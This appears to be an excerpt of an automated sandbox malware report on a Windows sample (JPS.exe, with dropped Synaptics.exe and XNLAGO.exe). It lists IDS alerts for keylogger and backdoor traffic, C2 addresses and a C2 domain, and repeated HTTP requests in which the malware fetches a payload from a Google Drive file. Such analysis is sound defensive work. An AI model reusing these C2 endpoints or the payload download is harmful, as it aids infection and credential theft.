                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:50001 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:50005 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:50030 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:50032 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:50073 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:50075 version: TLS 1.2
                              Source: JPS.exe, 00000000.00000000.1298292720.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: JPS.exe, 00000000.00000000.1298292720.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: JPS.exe, 00000000.00000000.1298292720.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                              Source: Synaptics.exe, 00000003.00000003.1387520897.0000000000535000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000003.00000003.1387520897.0000000000535000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000003.00000003.1387520897.0000000000535000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                              Source: JPS.exeBinary or memory string: [autorun]
                              Source: JPS.exeBinary or memory string: [autorun]
                              Source: JPS.exeBinary or memory string: autorun.inf
                              Source: RCX5246.tmp.0.drBinary or memory string: [autorun]
                              Source: RCX5246.tmp.0.drBinary or memory string: [autorun]
                              Source: RCX5246.tmp.0.drBinary or memory string: autorun.inf
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AADD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00AADD92
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AE2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00AE2044
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AE219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00AE219F
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AE24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00AE24A9
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AD6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_00AD6B3F
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AD6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_00AD6E4A
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ADF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00ADF350
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ADFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00ADFDD2
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ADFD47 FindFirstFileW,FindClose,2_2_00ADFD47
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00782044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00782044
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0078219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0078219F
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_007824A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_007824A9
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00776B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,10_2_00776B3F
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00776E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,10_2_00776E4A
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0077F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0077F350
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0077FD47 FindFirstFileW,FindClose,10_2_0077FD47
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0077FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_0077FDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0074DD92 GetFileAttributesW,FindFirstFileW,FindClose,10_2_0074DD92
                              Source: C:\Users\user\Desktop\JPS.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\JPS.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: excel.exeMemory has grown: Private usage: 1MB later: 69MB

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.11:49769 -> 69.42.215.252:80
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.11:49797 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:49797 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:49903 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:50009 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:50102 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.11:50136 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:50136 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:50140 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:50141 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:50144 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.11:50148 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:50148 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:50149 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:50147 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:50150 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.11:50151 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49845 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49761 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49825 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49776 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49788 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49826 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49837 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49787 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49775 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49859 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49892 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49762 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49802 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49857 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49799 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49839 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49878 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49847 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49900 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49890 -> 172.217.18.110:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49879 -> 172.217.18.110:443
                              C2 URLs / IPs found in malware configuration
                              Source: Malware configuration extractorURLs: xred.mooo.com
                              Uses dynamic DNS services
                              Source: unknownDNS query: name: freedns.afraid.org
                              Source: Joe Sandbox ViewIP Address: 172.111.138.100 172.111.138.100
                              Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                              Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AE550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,2_2_00AE550C
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=a_A08qj7AGhwYqYPAOUWBkXuJ3nCaJEFYO5HVpg_5f_J1SpytpXqqhYmA1eULkde7NfijU2zmayf_NNrPC0XAFhoBP3NP0kzjHQ4bF2OTU18bYRtTCWpd_lRmIQiW4WcKJPz9LIuQjeL-zxZJGxrAe8xrIjEX0fLr6U4UULYJOmBGT9tLThE2bOr
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
